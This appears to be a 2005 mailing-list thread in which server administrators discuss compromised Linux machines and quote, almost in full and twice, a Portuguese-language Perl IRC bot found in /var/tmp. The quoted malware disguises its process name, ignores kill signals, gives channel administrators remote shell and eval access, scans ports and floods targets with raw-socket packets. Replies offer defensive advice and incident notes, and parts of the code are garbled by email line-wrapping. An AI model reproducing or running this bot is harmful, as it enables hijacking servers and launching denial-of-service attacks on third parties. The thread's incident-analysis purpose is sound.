send(SCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

# DoS ? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SCK5, PF_INET, SCK_RAW, $pc) or next;
send(SCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

# ALIASES #

sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTIN $_[1]\001");
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}

sub notice {
return unless $#_ == 1;
sendraw("NTICE $_[0] :$_[1]");
}

sub op {
return unless $#_ == 1;
sendraw("MDE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MDE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MDE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MDE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MDE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MDE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}

sub modo {
return unless $#_ == 0;
sendraw("MDE $_[0] $_[1]");
}
sub mode { modo(@_); }

sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}

sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TPIC $_[0] $_[1]");
}
sub topic { topico(@_); }

sub whois {
return unless $#_ == 0;
sendraw("WHIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WH $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}

# DCC
package DCC;

sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};

my $msg;
my $nread = sysread($fh, $msg, 10240);

if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}

if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);

my $cur_byte = $DCC{$fh}{curbyte};

open(FILE, ">$arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);

my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";

if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";

#de cara manda os primeiro 1024 bytes do arkivo o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}

sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}

my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;

my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));

my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}

my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = I::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto ='tcp') and $dcc_sel->add($sendsock);
} until $sendsock;

$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;

&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");

}

sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "$arquivo")) {
close FILE;
} else {
return(0);
}

my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = I::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}

# po fico xato de organiza o status dai fiz ele retorna o status de acordo com o socket dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});

my $d_time = $ftime-$itime;

my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};

my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte 0;
my $porcen = ($cur_byte*100)/$bytes_total;

my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}

return(0);
}

sub fixaddr {
my ($address) = @_;

chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) {
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}

At first glance I'd say your atac.tbz contains a vulnerability scanner (ps), a
backdoored version of sshd (atac), a list of targets for the scanner
(uniq.txt), and a scan log (log.bigsshf).

The perl script also looks like a newer version of a script I pulled from a
compromised linux box a little while ago. The script you found claims to be
version 1.0 ($VERSA = '1.0') while the one I recovered was version 0.2. I
believe it's designed to connect to an IRC server and offer services from
your machine to people in a certain IRC channel (shell access, DS attack,
other stuff?).

If it helps, the header of the script I found contained this:

#!/usr/bin/perl
#
# ShellBT - FBI TEAM Corporation
#
# 0ldW0lf - effbeeye81 (AT) aol (DOT) com
# - www.security.cnc.net
#
#
#
CNFIGURACA
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que
vai aparece no ps

my $linas_max='8'; # Evita o flood :) depois de X linhas

In the FWIW file, this compromised linux box had been running a vulnerable
version of the awstats CGI which is how this script (among other things) got
in.

Friday 29 April 2005 12:03 pm, Andrew Y Ng wrote:
My server has been seeing some usual activities today, I don't have much
time to get down to the bottom of things, but after I investigated briefly
I have decided to disable PERL executable permission for www-data (Apache
process's user), also locked /var/tmp so www-data cannot write to it.

Looks like it ignores all the `kill` signals, not sure how I can actually
kill it
--
I found the included script in /var/tmp called d0s.txt.

I found a bunch of processes called ./atac 20 running, and found the
following content in /tmp/atac:

here's d0s.txt:

#!/usr/bin/perl
CNFIGURACA
my
$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que
vai aparece no ps #

my $MDME='+pi'; # Modo
Do Bot #

my $linas_max='10'; # Evita
o flood :) depois de X linhas #

my $sleep='3'; # ele
dorme X segundos # IRC
my
@adms=("DDS"); # Nick do administrador
#

my @canais=("#bots ddos");# Canais
#

my $nick='b0t'; # Nick do
bot. Caso esteja em uso vai aparecer # #
# aparecer com numero radonamico no final #

my $ircname = 'b0t'; # User ID
#

my $realname = '4Admin14: 4#DDS';
#

$servidor='irc.gigachat.net' unless $servidor; #
Servidor de irc que vai ser usado # #
# caso seja especificado no argumento #

my $porta='6667'; # Porta do
servidor de irc # ACESS A SHELL
my $secv =
1; # 1/0 pra habilita/desabilita acesso a
shell #

my $VERSA = '1.0';

$SIG{'INT'} = 'IGNRE';
$SIG{'HUP'} = 'IGNRE';
$SIG{'TERM'} = 'IGNRE';
$SIG{'CHLD'} = 'IGNRE';
$SIG{'PS'} = 'IGNRE';

use I::Socket;
use Socket;
use I::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
>
>
>
our %irc_servers;
our %DCC;
my $dcc_sel = new I::Select->new();
--
$sel_cliente = I::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = I::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
(defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con
:$realname"); sleep 1;
}

}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor",
"$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
>
>
>
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PNG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSIN\001$/) {
notice("$pn", "\001Bot powered by DDS TEAM\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg
=~ /^\!nick/); } elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
print "$0 Executado \n";
sendraw("JIN $canal");
sendraw("MDE $meunick $MDME");
sendraw("PRIVMSG $canal :Modo Alterado Para4 $MDME");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = I::Socket::INET->new(PeerAddr =$hostip,
PeerPort =$porta, Proto ='tcp', Timeout =4); if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas:
@aberta"); } else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta
aberta foi encontrada"); }
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002:
$dtime"."s"); sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M de
envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} +
$bytes{o})/1024)/$dtime)." kbps");
--
}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "D inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

#eu fiz um pacotadorzinhu e talz dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} =
$pacotes{tcp} = 0;

socket(SCK1, PF_INET, SCK_RAW, 2) or $cp++;
socket(SCK2, PF_INET, SCK_DGRAM, 17) or $cp++;
socket(SCK3, PF_INET, SCK_RAW, 1) or $cp++;
socket(SCK4, PF_INET, SCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and
$pacotes{igmp}++; send(SCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and
$pacotes{udp}++; send(SCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and
$pacotes{icmp}++; send(SCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and
$pacotes{tcp}++;

# DoS ? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SCK5, PF_INET, SCK_RAW, $pc) or next;
send(SCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and
$pacotes{o}++;; }
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
>
>
>

# ALIASES #

sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTIN $_[1]\001");
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}

sub notice {
return unless $#_ == 1;
sendraw("NTICE $_[0] :$_[1]");
}

sub op {
return unless $#_ == 1;
sendraw("MDE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MDE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MDE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MDE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MDE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MDE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}

sub modo {
return unless $#_ == 0;
sendraw("MDE $_[0] $_[1]");
}
sub mode { modo(@_); }

sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}

sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TPIC $_[0] $_[1]");
}
sub topic { topico(@_); }

sub whois {
return unless $#_ == 0;
sendraw("WHIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WH $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
>
>
>
# DCC
package DCC;

sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};

my $msg;
my $nread = sysread($fh, $msg, 10240);

if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}

if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);

my $cur_byte = $DCC{$fh}{curbyte};

open(FILE, ">$arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);

my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";

if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";

#de cara manda os primeiro 1024 bytes do arkivo o resto fik com
o sendcon open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
--
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}

my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;

my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));

my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}

my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = I::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto
='tcp') and $dcc_sel->add($sendsock); } until $sendsock;

$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
--
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");

}

sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "$arquivo")) {
close FILE;
} else {
return(0);
}

my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = I::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip,
PeerPort=>$dccporta, Timeout=>15) or return (0); $dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}

# po fico xato de organiza o status dai fiz ele retorna o status de
acordo com o socket dai o ADM.pl lista os sockets e faz as perguntas sub
Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});

my $d_time = $ftime-$itime;

my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};

my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte 0;
my $porcen = ($cur_byte*100)/$bytes_total;

my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total",
"$cur_byte","$d_time", "$rate", "$porcen"); }
--
return(0);
}
--
sub fixaddr {
my ($address) = @_;

chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~
/^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { return
$address;
} elsif ($address =~ tr/a-zA-Z//) {
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}

Fri, Apr 29, 2005 at 02:03:58PM -0500, Andrew Y Ng wrote:

My server has been seeing some usual activities today, I don't have much time
to get down to the bottom of things, but after I investigated briefly I have
decided to disable PERL executable permission for www-data (Apache process's
user), also locked /var/tmp so www-data cannot write to it.

Use chrot to protect your server slightly more against problems
with any buggy scripts.

This is almost certainly the result of an insecue PHP, Perl, or
other CGI script - rather than an Apache hack.

If you examine your webservers logs you might see where the
attack happened, perhaps you'll have entries invoking the
'wget' command to download the script you found from a remote
server - that's often a common attack.

If you're interested in protecting your server against input
designed to attack insecure applications you might wish to
investigate 'mod_security'.

mod-security homepage:
http://www.modsecurity.org/

mod-security under Debian example:

Looks like it ignores all the `kill` signals, not sure how I can actually
kill it

As root.

here's d0s.txt:

Connects to an irc server, forking to make its name less obvious
on the process list.

Steve

I have also had two servers compromised in a similar manner. Both
machines were running White Box Enterprise Linux 3.0 (RedHat EL clone,
for those not familier), and both were up to date with all the latest
patches (I update weekly, except for the kernel).

the first machine, about two or three weeks ago, I discovered a shell
running a perl script out of /tmp which was a UDP DDoS zombie program.
As far as I could tell, it got in through PHP somewhere, but I couldn't
tell where for sure. It's possible it came in through a vulnerable
phpBB2 installation, but I can not say for sure.

The second machine, which has been the subject of DDoS attacking for the
past week (about 40 megabits of inbound UDP traffic hitting the machine
for around 30 to 40 minutes, at random periods), ended up being a DDoS
zombie as well - sevearly effecting my systems by consuming all of my
bandwidth. This one definately got in through php, as I found several
php files containing a "phpshell" program which was obviously used to
execute the shell commands which started a "sh -c ./stealth <ip
address>" process which DS'd the target host. However, I really have no
idea /how/ this happened.

I have also heard from other people 'round the net and IRC that this is
happening to a lot of servers. Is this a security vulnerability in
Apache2/PHP, or simply a case of an exploitable configuration that many
people use?

Some notes I've made on the situation, nearly all attacking hosts have
been IP addresses that are assigned through RIPE (thus, are in europe)
They appear to be compromised servers. IP address making repeated
requests for the now removed phpshell file is 83.103.184.208, also
assigned through RIPE. Another odd thing was that 69.218.121.228 made
quite a few requests of my server searching for things like "/forum",
"/phpBB", "/bb" and the like, obviously looking for exploitable phpBB
installations.

I have no evidence to say such, but I think the attacks I was on the
receiving end of, are the same type of attack that was being dished out.
I have the UDP flooder script that was deposited in /tmp on the first
server, but (oddly) I couldn't locate the "stealth" script on the second
server. Try as I might, I could not locate a file by that name on the
filesystem.

